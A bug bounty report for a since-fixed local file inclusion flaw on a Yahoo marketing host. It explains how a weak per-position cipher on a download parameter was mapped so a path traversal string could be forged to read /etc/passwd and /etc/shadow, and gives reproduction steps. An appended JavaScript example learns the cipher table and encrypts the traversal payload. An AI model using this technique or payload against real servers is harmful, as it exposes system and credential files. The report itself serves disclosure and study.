Thank you for your submission to the Yahoo Bug Bounty program. We were able to reproduce the issue you reported and have implemented appropriate fixes. We appreciate your adherence to responsible disclosure guidelines and look forward to your future participation in the program.

Local File Include vulnerability on marketing-dam.yahoo.com
The vulnerable endpoint is marketing-dam.yahoo.com/DLMExt/DLAgent?dlurl=. Usually the GET parameter dlurl looks like this:
When this GET parameter is URL-decoded, the following "sub" GET parameters are visible:
The vulnerable parameter is hj, which is usually encrypted and reflected as the filename to be downloaded.
The parameter is encoded using ECB encryption with a block size of 32 characters.
I've mapped the characters using requests like 'aaaaaaaaaa...' (32 characters), and the server responded with 'aTYUYTSaTZUYVZTaUZVYWWXTZVYXUTZS'. So when I wanted to insert a 'T' at position 2 of the block, I knew I had to use the character 'a'.
This way I was able to craft encrypted strings on the fly (see Steps to reproduce and my attached PoC), which were decrypted by the server and directly used to load the file from the filesystem.
Since the web server used to serve the files is running as root, I was able to actually read not just the usual /etc/passwd but also /etc/shadow. Unfortunately, I was not able to get code execution on the server, but given enough time an attacker could quite surely exfiltrate enough information from the system (since the server is running as root) to perform remote code execution.
Steps to reproduce:
1. Go to https://brandtoolkit.yahoo.com/ and request a download for any file. The download popup should appear; take the URL and save it for later.
2. Use my PoC to encrypt the following string: /../../../../../../../../etc/passwd, or use this already encrypted string
(Please note that this PoC is written with Node.js in mind, but the function encrypt should run in any other JS environment as long as you copy the blocks object with it.)
3. Replace the string after hj%3D in the saved download URL with the encrypted string.
4. After executing the "download" you will see the contents of /etc/passwd.
Since I don't want to post any critical information that could be used after the vulnerability has been fixed, I'm not attaching the /etc/passwd file, but I'll give you its length, which is 610. This way you can probably verify this vulnerability more quickly.
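The following is an added example, not the reporter's attached PoC, covering both the mapping technique described above (probe the endpoint with a character repeated 32 times, record which ciphertext character appears at each position) and step 2 of the reproduction (encrypt the traversal payload for the hj parameter). Because the real endpoint is not available, the remote cipher is replaced by a hypothetical seeded stand-in (makeOracle); the only real data used is the 'a'-probe response quoted in the report. The ALPHABET, the handling of a trailing partial block, and the function names are assumptions.

```javascript
// Added example, not the report's own PoC: models the position-dependent
// substitution the report describes (each of the 32 positions in a block has
// its own plaintext -> ciphertext character map, repeated block by block) and
// shows how to learn that map from probe requests and encrypt a payload with it.

const BLOCK = 32;

// Constructed alphabet covering the payload characters; the report does not
// state which characters the real endpoint accepts.
const ALPHABET = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789/._-';

// The one real probe quoted in the report: 32 x 'a' and the server's answer.
const PROBE_A = 'a'.repeat(BLOCK);
const RESPONSE_A = 'aTYUYTSaTZUYVZTaUZVYWWXTZVYXUTZS';

// Hypothetical stand-in for the remote endpoint: a seeded, deterministic
// per-position substitution. This is NOT the server's real cipher; it only
// gives the learning code something to query offline.
function makeOracle(seed) {
  let s = seed >>> 0;
  const rand = () => {
    s = (Math.imul(s, 1664525) + 1013904223) >>> 0; // LCG, fine for a toy
    return s / 4294967296;
  };
  const tables = [];
  for (let pos = 0; pos < BLOCK; pos++) {
    const shuffled = ALPHABET.split('');
    for (let j = shuffled.length - 1; j > 0; j--) { // Fisher-Yates shuffle
      const k = Math.floor(rand() * (j + 1));
      [shuffled[j], shuffled[k]] = [shuffled[k], shuffled[j]];
    }
    const map = {};
    [...ALPHABET].forEach((c, idx) => { map[c] = shuffled[idx]; });
    tables.push(map);
  }
  return (plain) => [...plain].map((c, i) => tables[i % BLOCK][c]).join('');
}

// One probe teaches one column of the table: sending c repeated 32 times
// reveals blocks[i][c] = response[i] for every position i.
function learnColumn(blocks, plainChar, response) {
  if (response.length !== BLOCK) throw new Error('probe response must be one full block');
  for (let i = 0; i < BLOCK; i++) {
    blocks[i] = blocks[i] || {};
    blocks[i][plainChar] = response[i];
  }
  return blocks;
}

// Map every character of the alphabet with one oracle query each.
function learnBlocks(oracle, alphabet) {
  const blocks = [];
  for (const c of alphabet) learnColumn(blocks, c, oracle(c.repeat(BLOCK)));
  return blocks;
}

// Inverse lookup, the way the report phrases it: which plaintext character at
// position `pos` produces `cipherChar`?
function plainCharFor(blocks, pos, cipherChar) {
  for (const [p, c] of Object.entries(blocks[pos])) if (c === cipherChar) return p;
  return undefined;
}

// Encrypt arbitrary text with the learned table, block by block. Assumption:
// a trailing partial block is encoded position-wise like a full one (the
// report does not say how the server pads).
function encrypt(blocks, plain) {
  let out = '';
  for (let i = 0; i < plain.length; i++) {
    const c = blocks[i % BLOCK] && blocks[i % BLOCK][plain[i]];
    if (c === undefined) throw new Error(`no mapping for ${JSON.stringify(plain[i])} at position ${i}`);
    out += c;
  }
  return out;
}

const PAYLOAD = '/../../../../../../../../etc/passwd';

function demo() {
  const oracle = makeOracle(0xC0FFEE);
  const blocks = learnBlocks(oracle, ALPHABET);
  const hj = encrypt(blocks, PAYLOAD);
  // In the real attack this value replaces what follows hj%3D in the saved
  // download URL; here it is only checked against the stand-in oracle.
  return { hj, matchesOracle: hj === oracle(PAYLOAD) };
}

console.log(demo());
```

Against the real endpoint, makeOracle would be replaced by a function that sends the 32-character probe in the hj parameter and returns the reflected filename; everything else stays the same. Note that one probe per alphabet character is enough, since every probe fills one column of all 32 position tables at once.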